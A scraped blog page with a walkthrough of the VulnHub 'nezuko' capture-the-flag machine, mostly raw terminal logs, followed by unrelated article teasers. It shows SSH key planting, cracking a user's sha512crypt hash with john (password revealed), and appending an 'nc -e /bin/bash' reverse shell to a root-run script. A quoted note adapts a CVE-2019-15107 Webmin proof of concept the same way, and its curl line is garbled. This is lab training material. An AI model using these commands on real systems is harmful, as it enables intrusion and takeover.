                                                                                                                                                               
                                                                                                                                                               
                                                                                                                                                               
                                                                                                                                                               
                                                                                                                                                               
                                                                                                                                                               
                                                                                                                                                               

3f2ada6791f96b6a50a9ee43ee6b62df



sshkey

┌──(pinginglab㉿pinginglab)-[~/vulnhub/nezuko]
└─$ ssh-keygen -t rsa    
Generating public/private rsa key pair.
Enter file in which to save the key (/home/pinginglab/.ssh/id_rsa): sshkey
Enter passphrase (empty for no passphrase): 
Enter same passphrase again: 
Your identification has been saved in sshkey
Your public key has been saved in sshkey.pub
The key fingerprint is:
SHA256:YyAJh37bhxAcyQPLL9V6SEPXlz2xgHrBlpJkLsD7i4o pinginglab@pinginglab
The key's randomart image is:
+---[RSA 3072]----+
| .+=++++ o.o..   |
| .o***o B o.o.   |
| .o.Bo++ o  ..   |
|  o+o*...        |
|  .o++.oS        |
|   .o.o...       |
|   . . .         |
|. . .            |
|E.               |
+----[SHA256]-----+
                                                                                   
┌──(pinginglab㉿pinginglab)-[~/vulnhub/nezuko]
└─$ ls                              
 47230.rb  'shell1 copy.sh'   shell1.sh   sshkey   sshkey.pub
                                                                                   
┌──(pinginglab㉿pinginglab)-[~/vulnhub/nezuko]
└─$ cat sshkey.pub       
ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABgQDL6dNXCdbpYWynuXtPoTnuye9/isxXsiIBC1dqL/JWBulE7ebQSWOaIe1AW3P+m0zaWSttxIG3Yv+66vGiZ8vYkOz2IqiBhKPmhUA5MfAvjZ+13yGLFAnWymIGAz/XEE3fU/8K3WLB9J058WOG9pDFGDYhS0fwr+/g99tFI3dGyw0eWEdaX0l8FSuN1HSA53xM8cO6Manx4409cXuCbPy0xX6xFMOFfeZMmzCEUXLp3U/ofB8yzLVv+7gTRaxIgZ7EJgxGfBgFf3jLnZJW4G4YiNtMK7BSSau8C2Kt+5Sq0bmM9+GjsUFLQWHUHMmSo2tO/eYuJZnZVkKt1HOwnjjBLgqUWrbDzsuk8qEXzhFH8W7qIZqb3dEDLLnqDZ2QH3dBxVFAYCq6sTvoS5AB16WplDKLLV4JRdfps3rZOJ7GXlIkcfkyq+3L3FdTrY83FX4ZrSSat1/uUouYdHfVbOi9/xfXUn7UnjmdCQTxoOIZvdHnztGHbt4cazGwd/AwW2E= pinginglab@pinginglab
                                                
                                                
                                      
                                      cat /home/nezuko/.ssh/authorized_keys
ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABgQDL6dNXCdbpYWynuXtPoTnuye9/isxXsiIBC1dqL/JWBulE7ebQSWOaIe1AW3P+m0zaWSttxIG3Yv+66vGiZ8vYkOz2IqiBhKPmhUA5MfAvjZ+13yGLFAnWymIGAz/XEE3fU/8K3WLB9J058WOG9pDFGDYhS0fwr+/g99tFI3dGyw0eWEdaX0l8FSuN1HSA53xM8cO6Manx4409cXuCbPy0xX6xFMOFfeZMmzCEUXLp3U/ofB8yzLVv+7gTRaxIgZ7EJgxGfBgFf3jLnZJW4G4YiNtMK7BSSau8C2Kt+5Sq0bmM9+GjsUFLQWHUHMmSo2tO/eYuJZnZVkKt1HOwnjjBLgqUWrbDzsuk8qEXzhFH8W7qIZqb3dEDLLnqDZ2QH3dBxVFAYCq6sTvoS5AB16WplDKLLV4JRdfps3rZOJ7GXlIkcfkyq+3L3FdTrY83FX4ZrSSat1/uUouYdHfVbOi9/xfXUn7UnjmdCQTxoOIZvdHnztGHbt4cazGwd/AwW2E= pinginglab@pinginglab 


image-20230115213203287

┌──(pinginglab㉿pinginglab)-[~/vulnhub/nezuko]
└─$ ssh -i sshkey nezuko@192.168.219.180                        
The authenticity of host '192.168.219.180 (192.168.219.180)' can't be established.
ED25519 key fingerprint is SHA256:2Ru1IBosCTKF6TvCVfZdwFwIaEjQloQOwvpfhwVTi04.
This key is not known by any other names
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '192.168.219.180' (ED25519) to the list of known hosts.
Warning: SSH client configured for wide compatibility by kali-tweaks.
Welcome to Ubuntu 18.04.2 LTS (GNU/Linux 4.18.0-15-generic x86_64)

 * Documentation:  https://help.ubuntu.com
 * Management:     https://landscape.canonical.com
 * Support:        https://ubuntu.com/advantage


 * Canonical Livepatch is available for installation.
   - Reduce system reboots and improve kernel security. Activate at:
     https://ubuntu.com/livepatch

404 packages can be updated.
189 updates are security updates.

New release '20.04.5 LTS' available.
Run 'do-release-upgrade' to upgrade to it.

Your Hardware Enablement Stack (HWE) is supported until April 2023.
Last login: Wed Aug 21 01:12:52 2019
nezuko@ubuntu:~$ ls
from_zenitsu  nezuko.txt
nezuko@ubuntu:~$ ls
from_zenitsu  nezuko.txt
nezuko@ubuntu:~$ pwd
/home/nezuko
nezuko@ubuntu:~$ cd /home
nezuko@ubuntu:/home$ ls
nezuko  zenitsu
nezuko@ubuntu:/home$ sudo su zenitsu
[sudo] password for nezuko: 
Sorry, try again.
[sudo] password for nezuko: 
Sorry, try again.
[sudo] password for nezuko: 
sudo: 2 incorrect password attempts
nezuko@ubuntu:/home$ ls
nezuko  zenitsu
nezuko@ubuntu:/home$ cat /etc/passwd
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
systemd-network:x:100:102:systemd Network Management,,,:/run/systemd/netif:/usr/sbin/nologin
systemd-resolve:x:101:103:systemd Resolver,,,:/run/systemd/resolve:/usr/sbin/nologin
syslog:x:102:106::/home/syslog:/usr/sbin/nologin
messagebus:x:103:107::/nonexistent:/usr/sbin/nologin
_apt:x:104:65534::/nonexistent:/usr/sbin/nologin
uuidd:x:105:111::/run/uuidd:/usr/sbin/nologin
avahi-autoipd:x:106:112:Avahi autoip daemon,,,:/var/lib/avahi-autoipd:/usr/sbin/nologin
usbmux:x:107:46:usbmux daemon,,,:/var/lib/usbmux:/usr/sbin/nologin
dnsmasq:x:108:65534:dnsmasq,,,:/var/lib/misc:/usr/sbin/nologin
rtkit:x:109:114:RealtimeKit,,,:/proc:/usr/sbin/nologin
cups-pk-helper:x:110:116:user for cups-pk-helper service,,,:/home/cups-pk-helper:/usr/sbin/nologin
speech-dispatcher:x:111:29:Speech Dispatcher,,,:/var/run/speech-dispatcher:/bin/false
whoopsie:x:112:117::/nonexistent:/bin/false
kernoops:x:113:65534:Kernel Oops Tracking Daemon,,,:/:/usr/sbin/nologin
saned:x:114:119::/var/lib/saned:/usr/sbin/nologin
pulse:x:115:120:PulseAudio daemon,,,:/var/run/pulse:/usr/sbin/nologin
avahi:x:116:122:Avahi mDNS daemon,,,:/var/run/avahi-daemon:/usr/sbin/nologin
colord:x:117:123:colord colour management daemon,,,:/var/lib/colord:/usr/sbin/nologin
hplip:x:118:7:HPLIP system user,,,:/var/run/hplip:/bin/false
geoclue:x:119:124::/var/lib/geoclue:/usr/sbin/nologin
gnome-initial-setup:x:120:65534::/run/gnome-initial-setup/:/bin/false
gdm:x:121:125:Gnome Display Manager:/var/lib/gdm3:/bin/false
nezuko:x:1000:1000:nezuko,,,:/home/nezuko:/bin/bash
zenitsu:$6$LbPWwHSD$69t89j0Podkdd8dk17jNKt6Dl2.QYwSJGIX0cE5nysr6MX23DFvIAwmxEHOjhBj8rBplVa3rqcVDO0001PY9G0:1001:1001:,,,:/home/zenitsu:/bin/bash
sshd:x:122:65534::/run/sshd:/usr/sbin/nologin

crack hash:

┌──(pinginglab㉿pinginglab)-[~/vulnhub/nezuko]
└─$ cat "$6$LbPWwHSD$69t89j0Podkdd8dk17jNKt6Dl2.QYwSJGIX0cE5nysr6MX23DFvIAwmxEHOjhBj8rBplVa3rqcVDO0001PY9G0" >> zenhash.txrt
cat: t89j0Podkdd8dk17jNKt6Dl2.QYwSJGIX0cE5nysr6MX23DFvIAwmxEHOjhBj8rBplVa3rqcVDO0001PY9G0: 没有那个文件或目录
                                                                                   
┌──(pinginglab㉿pinginglab)-[~/vulnhub/nezuko]
└─$ cat "$6$LbPWwHSD$69t89j0Podkdd8dk17jNKt6Dl2.QYwSJGIX0cE5nysr6MX23DFvIAwmxEHOjhBj8rBplVa3rqcVDO0001PY9G0" >> zenhash.txt 
cat: t89j0Podkdd8dk17jNKt6Dl2.QYwSJGIX0cE5nysr6MX23DFvIAwmxEHOjhBj8rBplVa3rqcVDO0001PY9G0: 没有那个文件或目录
                                                                                   
┌──(pinginglab㉿pinginglab)-[~/vulnhub/nezuko]
└─$ echo  "$6$LbPWwHSD$69t89j0Podkdd8dk17jNKt6Dl2.QYwSJGIX0cE5nysr6MX23DFvIAwmxEHOjhBj8rBplVa3rqcVDO0001PY9G0" >> zenhash.txt
                                                                                   
                                                        
┌──(pinginglab㉿pinginglab)-[~/vulnhub/nezuko]
└─$ john - zenhash.txt
Completing option
--bare-always-valid                      -- treat bare hashes as valid (Y/N)     
--config                -c               -- use config                           
--costs                                  -- load salts with(out) cost value Cn (t
--crack-status                           -- emit a status line whenever a passwor
--device                                 -- set OpenCL device (list using --list=
--dupe-suppression                       -- suppress all dupes in wordlist (and f
--dupe-suppression                       -- suppress all dupes in wordlist (and f
--external                               -- external mode or word filter         
--field-separator-char                   -- use "C" instead of ":" in input and p
--fork                                   -- fork N processes                     
--format                                 -- use specific format                  
--groups                                 -- do not load these group only         
--help                  -h               -- display help                         
-i                                       -- specify: -[incremental mode]         
--incremental           -i                                                     
--incremental           -i               -- incremental mode                     
--input-encoding        --encoding       -- input data is non-ascii (eg. UTF-8, I
--internal-codepage                      -- codepage used in rules/masks         
--keep-guessing                          -- try finding plaintext collisions     
--length                                 -- shortcut for --min-len=N --max-len=N 
--list                                   -- list capabilities                    
--log-stderr                             -- log to screen instead of file        
--loopback              --loopback       -- like --wordlist, but fetch words from
--make-charset                           -- make a charset file. It will be overw
--markov                --markov         -- markov mode                          
--mask                                   -- mask mode using MASK (or default from
--max-candidates                         -- gracefully exit after this many candi
--max-length                             -- request a maximum candidate length in
--max-run-time                           -- gracefully exit after this many secon
--max-run-time                           -- gracefully exit after this many secon
--mem-file-size                          -- size threshold for wordlist preload (
--min-length                             -- request a minimum candidate length in
--mkpc                                   -- request a lower max. keys per crypt  
--mkv-stats                              -- markov stats file (see doc/MARKOV)   
--node                                   -- this node's number range out of TOTAL
--no-keep-guessing                       -- do not try finding plaintext collisio
--no-log                                 -- disables creation and writing to john
--no-mask                                -- used with --test for alternate benchm
--pipe                                   -- read from pipe/stdin but with rules  
--platform                               -- set OpenCL platform                  
--pot                                    -- pot file to use                      
--prince                                 -- PRINCE mode, read words from FILE    
--prince-case-permute                    -- permute case of first letter         
--prince-elem-cnt-max                    -- maximum number of elements per chain 
--prince-elem-cnt-min                    -- minimum number of elements per chain 
--prince-keyspace                        -- just show total keyspace that would b
--prince-limit                           -- limit number of candidates generated 
--prince-loopback                        -- fetch words from a .pot file         
--prince-mmap                            -- memory-map infile (not available with
--prince-skip                            -- initial skip                         
--prince-wl-dist-len    --prince-wl-max  -- calculate length distribution from wo
--progress-every                         -- emit a status line every N seconds   
--regen-lost-salts                       -- regenerate lost salts (see doc/OPTION
--regen-lost-salts                       -- brute force unknown salts            
--reject-printable                       -- reject printable binaries            
--restore               --restore        -- restore an interrupted session       
--rules                 -r               -- use rule                             
--rules-skip-nop                         -- skip any NOP ":" rules (you already r
--rules-stack                            -- stacked rules                        
--salts                                  -- load salts with(out) COUNT (to MAX) h
--save-memory                            -- Enable memory saving, at LEVEL 1..3  
--session               --session        -- give a new session the NAME          
--show=LEFT             --show           -- show cracked passwords (if =LEFT, the
--single                                 -- use single crack mode                
--single-retest-guess                    -- override config for SingleRetestGuess
--single-seed                            -- add static seed words for all salts i
--single-wordlist                        -- short wordlist with static seed words
--skip-self-tests                        -- skip self tests                      
--status                --status         -- print status of a session            
--stdout                --stdout         -- just output candidate passwords      
--stress-test                            -- loop self tests forever              
--subformat                              -- pick a benchmark format for --format=
--subsets                                -- "subsets" mode (see doc/SUBSETS)     
--subsets-max-diff                       -- Maximum unique characters in subset  
--subsets-min-diff                       -- Minimum unique characters in subset  
--subsets-required                       -- The N first characters of "subsets" c
--test-full                              -- run more thorough self-tests         
--tuning                                 -- tuning options (auto/report/N)       
--users                                  -- do not load these users only         
--verbosity                              -- change verbosity (1-5 or 6 for debug,
--wordlist              -w                                                     
--wordlist              -w               -- use wordlist                         
-w
┌──(pinginglab㉿pinginglab)-[~/vulnhub/nezuko]
└─$ john --wordlist = /usr/share/wordlists/rockyou.txt  zenhash.txt
stat: =: No such file or directory
                                                                                   
┌──(pinginglab㉿pinginglab)-[~/vulnhub/nezuko]
└─$ john --wordlist=/usr/share/wordlists/rockyou.txt  zenhash.txt 
Using default input encoding: UTF-8
No password hashes loaded (see FAQ)
                                                                                   
┌──(pinginglab㉿pinginglab)-[~/vulnhub/nezuko]
└─$ john --wordlist=/usr/share/wordlists/rockyou.txt  zenhash.txt
Using default input encoding: UTF-8
Loaded 1 password hash (sha512crypt, crypt(3) $6$ [SHA512 256/256 AVX2 4x])
Cost 1 (iteration count) is 5000 for all loaded hashes
Will run 2 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
meowmeow         (?)     
1g 0:00:00:00 DONE (2023-01-15 21:27) 1.030g/s 3694p/s 3694c/s 3694C/s asdf1234..fresa
Use the "--show" option to display all of the cracked passwords reliably
Session completed. 
                                                                                   
┌──(pinginglab㉿pinginglab)-[~/vulnhub/nezuko]
└─$ 

meowmeow

switch user:

nezuko@ubuntu:/home$ su zenitsu
Password: 
zenitsu@ubuntu:/home$ ls
nezuko  zenitsu
zenitsu@ubuntu:/home$ ls
nezuko  zenitsu
zenitsu@ubuntu:/home$ id
uid=1001(zenitsu) gid=1001(zenitsu) groups=1001(zenitsu)
zenitsu@ubuntu:/home$ cd zenitsu/
zenitsu@ubuntu:~$ ls
to_nezuko  zenitsu.txt
zenitsu@ubuntu:~$ cd to_nezuko/
zenitsu@ubuntu:~/to_nezuko$ ls
send_message_to_nezuko.sh
zenitsu@ubuntu:~/to_nezuko$ cat send_message_to_nezuko.sh 
#!/bin/bash
date=$(date '+%d-%m-%Y_%H:%M')
echo "nezuko chan, would you like to go on a date with me? " > /home/nezuko/from_zenitsu/new_message_$date
zenitsu@ubuntu:~/to_nezuko$ ls -al
total 12
drwxr-xr-x 2 zenitsu root    4096 Ogos 21  2019 .
drwxr-xr-x 4 zenitsu zenitsu 4096 Ogos 21  2019 ..
-rw-r--r-- 1 zenitsu root     150 Ogos 21  2019 send_message_to_nezuko.sh
zenitsu@ubuntu:~/to_nezuko$ echo  "nc -e /bin/bash 192.168.219.177 5555" >> send_message_to_nezuko.sh 
zenitsu@ubuntu:~/to_nezuko$ cat send_message_to_nezuko.sh 
#!/bin/bash
date=$(date '+%d-%m-%Y_%H:%M')
echo "nezuko chan, would you like to go on a date with me? " > /home/nezuko/from_zenitsu/new_message_$date
nc -e /bin/bash 192.168.219.177 5555
zenitsu@ubuntu:~/to_nezuko$ 

image-20230115213639971

third flag

┌──(pinginglab㉿pinginglab)-[~]
└─$ nc  -lnvp 5555
listening on [any] 5555 ...

id
id
id
id
id
id
connect to [192.168.219.177] from (UNKNOWN) [192.168.219.180] 41430
uid=0(root) gid=0(root) groups=0(root)
uid=0(root) gid=0(root) groups=0(root)
uid=0(root) gid=0(root) groups=0(root)
uid=0(root) gid=0(root) groups=0(root)
uid=0(root) gid=0(root) groups=0(root)
uid=0(root) gid=0(root) groups=0(root)
id
uid=0(root) gid=0(root) groups=0(root)
ls
root.txt
snap
cat root.txt
Congratulations on getting the root shell!
Tell me what do you think about this box at my twitter, @yunaranyancat

.................                                                                                          ..........................                  ........
................                                                                                            ........................                   ........
...............                                     ...   .       .                                         ........................                   ........
      .  ... ..                                 ...............................                             ........................                   ........
.    ...........                             ....................................                          .........................                   ........
.  ... .........                          .................,,,,,,,,.................                       .........................                   ........
       .. ......                         ..............,,,,,,,,,,,,,,,,,,............                      .........................                   ........
.       .   ....                        ...........,,,,,,,,,,,,,,,,,,,,,,,,,,.........                      ........................                    ..... .
              .                        .........,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,........                        ......................                    .......
      .  . .                          .......,,,,,,,,,,,,,,,,,,******,*********,.......                        .....................                    .......
          .                          .....,,,,,,,,,,,,,,***,**********************......                          ..................                    .......
                                   ....,,,,,,,,,,***********************************.....                          .................                    .... ..
                                  ...,,,,*********************************************.....                       ..................                    . .....
                                ....**********,.    .,*****************,       ,********....                      ..................                    . .....
                               ...******,  ,***************************************. *****...                     ..................                       .. .
                              ...*** .**************,***********************************,,*,..                    ..................                        ...
                             ..,.,******************.,*****************,..,*****************,.                  ................. .                       .    
                             ..**************,,,.......***************,.,......,*************.                 ............... ...                             
                             .**********************,,,,*************,,.*********************,                ................ .. .                            
                             .**********          .***.,,************,***.            ,.******               .............                                     
                              ******     *(###(/,   **/*,,**********   ,(#####(*     *              ..............                                     
                              ,***    ,##########/,, **///*...,##########(,..  .,/              ...  ..                                            
                               ***..,..,,,,,,,,,,,,/,*///..,,,*****,,,,*,,.//*             ..  ....       .                                    
                                //.............//............../*                ..... ..                                          
                                 *.            ///            .((//,                 ..                                                
                                  ,,          ///(,           ((//. .                                                                  
                                   *//.*// ...  **.///./ ...... //.//..                                                                    
                                    ///,/ .                                                                    
                                     /*,,/// .                                                                     
                                  ,. .///,,,,//,...,                                                                   
                                 , ,,.*///*,,//,,, ,                                                                   
                                 ,,.,,/,/ ,.                                                                   
                                    ,/,///*/                                                                       
                                     */                                                                        
                                      .///,,//                                                                         
                                        .............,//*                                                                          
                                          ///,,,,//                                                                            
                                            **,,,                                                                              
                                         .,, , ///.,,,,,.                                                                          
                                       /,,,, /,,, *..,,/..,,,/                                                                         
                                       /*,,,,,,,,.,.  //  ,.,,,,,,,,,/                                                                         
                                       ,//,,,,,,,,,,,,,,, ,/.,,,,,,,,,,,,,,//                                                                          
                                          *,,,,,,,,,...,,,,,,.   ,,,,,,,,..,,,,,,,.  .//,                                                                      
                                    */*.        .,,,,,,,,,,.,,.,,.,,,,,,,,,,,.       ,**/***                                                                   


3ca33b8158d9dee5c35a7d6d793c7fd5


other escape

image-20230115215233660

image-20230115215246677

image-20230115215842807

image-20230115215854321

using:

https://www.bilibili.com/read/cv3530863/

然后改一下poc.sh这个脚本,把脚本里面执行echo '$FLAG’的那一段,改成nc -e /bin/bash attack_ip port就好了,改好之后就是这样的:

echo -n "Testing for RCE (CVE-2019-15107) on $URI: ";
curl -ks KaTeX parse error: Expected 'EOF', got '&' at position 41: … -d 'user=wheel&̲pam=&expired=2&…URI’/session_login.cgi’|grep $FLAG>/dev/null 2>&1

作者:合天网安实验室 https://www.bilibili.com/read/cv3530863/ 出处:bilibili

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处:http://www.coloradmin.cn/o/177730.html

如若内容造成侵权/违法违规/事实不符,请联系多彩编程网进行投诉反馈,一经查实,立即删除!

相关文章

在Java中使用堆排序求解TopK问题

在Java中使用堆排序求解TopK问题 1. 问题描述 给定一个很大的数组&#xff0c;长度100w&#xff0c;求第k大的数是多少&#xff1f; 这个问题是一个很经典的问题&#xff0c;如果采用传统方式&#xff0c;即现排序&#xff0c;然后找到第k个数&#xff0c;对于数据量很大的时…

Knowledge-based-BERT(一)

多种预训练任务解决NLP处理SMILES的多种弊端&#xff0c;代码&#xff1a;Knowledge-based-BERT&#xff0c;原文&#xff1a;Knowledge-based BERT: a method to extract molecular features like computational chemists&#xff0c;代码解析从K_BERT_pretrain开始。模型框架…

Tkinter的Listbox控件

Tkinter的Listbox控件是个选项框&#xff0c;主要是用来在给定的选项中选择一个 使用方法 创建选项框Listbox 和其他控件的创建方法一样&#xff0c;直接创建即可&#xff0c;命名为Lb Lbtk.Listbox(root) Lb.pack() 在选项框中加入选项 可以边创建边添加&#xff0c;即利…

【C#】WPF实现经典纸牌游戏,适合新手入门

文章目录1 纸牌类2 布局3 初始化4 事件点击牌堆拖动牌的去留源代码1 纸牌类 之所以产生这个无聊至极的念头&#xff0c;是因为发现Unicode中竟然有这种字符。。。 黑桃&#x1f0a1; &#x1f0a2; &#x1f0a3; &#x1f0a4; &#x1f0a5; &#x1f0a6; &#x1f0a7; &…

【设计模式】结构型模式·外观模式

学习汇总入口【23种设计模式】学习汇总(数万字讲解体系思维导图) 写作不易&#xff0c;如果您觉得写的不错&#xff0c;欢迎给博主来一波点赞、收藏~让博主更有动力吧&#xff01;> 学习汇总入口 一.概述 外观&#xff08;Facade&#xff09;模式是七大设计原则“迪米特法则…

谷粒商城-高级篇-Day12-性能压测和缓存

文章目录性能优化nginx动静分离优化三级分类的获取&#xff08;优化业务&#xff09;分布式缓存整合redis高并发下的缓存失效问题缓存穿透缓存雪崩缓存击穿解决这些问题分布式锁Redisson可重入锁&#xff08;Reentrant Lock&#xff09;指定过期时间读写锁闭锁信号量使用Redssi…

Python实现一个简易的CLI翻译程序

Python实现一个简易的CLI翻译程序Python百度翻译API实现一个简易的CLI翻译程序获取百度翻译API编写一个简单的Python程序Python百度翻译API实现一个简易的CLI翻译程序 之前翻译用的linux上的golddict,每次翻译都很慢。。。 所以想写一个简单快速的翻译命令行翻译软件 获取百度…

Allegro如何自动高亮不等长的网络操作指导

Allegro如何自动高亮不等长的网络操作指导 在做PCB设计的时候,时常需要要做等长,Allegro可以自动高亮一组内不等长的网络,可以直观的看到哪些网络长度是不满足的,类似下图 绿色的是通过的,红色是长度不足的,粉色是超长的 具体操作如下 选择Route-Timing Vision出现optio…

Springboot359的医院病历管理系统

目 录 摘 要 I ABSTRACT II 目 录 II 第1章 绪论 1 1.1背景及意义 1 1.2 国内外研究概况 1 1.3 研究的内容 1 第2章 相关技术 2 第3章 系统分析 3 3.1 需求分析 3 3.2 系统可行性分析 4 3.2.1技术可行性&#xff1a;技术背景 4 3.2.2经济…

Ubiquiti MAC Address Changer 3.0 Crack

Ubiquiti MAC Address Changer&#xff0c;目前mac address changer的版本有很多&#xff0c;本次发布的是V3版本&#xff0c;这是一款功能非常强大的修改网卡mac地址软件&#xff0c;基本上所有的网卡MAC地址都支持修改&#xff0c;包括虚拟机和TeamViewer软件都是支持的。 Ea…

5、基本数据类型

目录 一、整数类型 二、浮点类型 三、字符类型 四、布尔类型 一、整数类型 整数类型用来存储整数数值&#xff0c;即没有小数部分的数值。可以是正数&#xff0c;也可以是负数。整 型数据在Java程序中有3种表示形式&#xff0c;分别为十进制、八进制和十六进制。 1.十进…

2.4.4 数值类型的转换

文章目录1.运算时的自转2.运算时的强转3.强转时的精度丢失问题1.运算时的自转 不同数字类型之间的大小关系如下&#xff1a;double > float > long > int > char, short,byte 自转&#xff1a;小类型的数据可以直接赋值给大类型的变量&#xff1b; byte short c…

Linux(五)创建一个miniShell

前情提要&#xff1a;掌握进程控制中的进程创建、进程终止、进程等待、进程替换。可以参考下方博文 LInux&#xff08;四&#xff09;进程控制&#xff08;创建、终止、等待、替换&#xff09; 了解strtok函数的使用 正文&#xff1a; 目录 Shell是什么&#xff1f; 如何…

蓝桥杯之二分与前缀和

蓝桥杯之二分二分板子&#xff1f;第一次和最后一次出现的位置机器人跳跃问题四平方和分巧克力&#xff1f;典型二分找大的&#xff08;从右往左找&#xff09;二分upper_bound(a1,an1,x)-a&#xff1f;递增三元组前缀和取余&#xff1f;K倍区间二维前缀和&#xff1f;激光炸弹…

17种编程语言实现排序算法-合并排序

开源地址 https://gitee.com/lblbc/simple-works/tree/master/sort/ 覆盖语言&#xff1a;C、C、C#、Java、Kotlin、Dart、Go、JavaScript(JS)、TypeScript(TS)、ArkTS、swift、PHP。 覆盖平台&#xff1a;安卓(Java、Kotlin)、iOS(SwiftUI)、Flutter(Dart)、Window桌面(C#)、…

分享139个ASP源码,总有一款适合您

ASP源码 分享139个ASP源码&#xff0c;总有一款适合您 下面是文件的名字&#xff0c;我放了一些图片&#xff0c;文章里不是所有的图主要是放不下...&#xff0c; 139个ASP源码下载链接&#xff1a;https://pan.baidu.com/s/1Vk4U4EXVCWZWPMWf9ax2dw?pwdif23 提取码&#x…

【C++】类和对象(上)---什么是类?

目录1.面向过程和面向对象初步认识2.类的引入2.1使用struct定义类3.类的定义3.1类的两种定义方式&#xff1a;3.2成员变量命名规则的建议3.3成员函数与成员变量定义的位置建议4.类的访问限定符及封装4.1访问限定符4.2封装5.类的作用域6.类的实例化7.类对象模型7.1如何计算类对象…

springboot静态资源目录访问,及自定义静态资源路径,index页面的访问

springboot静态资源目录访问&#xff0c;及自定义静态资源路径&#xff0c;index页面的访问静态资源目录的访问位置静态资源访问测试自定义静态资源路径和静态资源请求映射web首页的访问自定义静态资源请求映射影响index.html首页的访问的**解决方案**&#xff1a;1.取消自定义…

【JUC系列】CountDownLatch实现原理

简单示例 public class Main {private static final int NUM 3;public static void main(String[] args) throws InterruptedException {CountDownLatch latch new CountDownLatch(NUM);for (int i 0; i < NUM; i) {new Thread(() -> {try {Thread.sleep(2000);Syste…

梯度之上:Hessian 矩阵

原文链接&#xff1a;原文 文章目录梯度之上&#xff1a;Hessian 矩阵梯度、雅克比矩阵海森矩阵海森矩阵应用梯度之上&#xff1a;Hessian 矩阵 本文讨论研究梯度下降法的一个有力的数学工具&#xff1a;海森矩阵。在讨论海森矩阵之前&#xff0c;需要首先了解梯度和雅克比矩阵…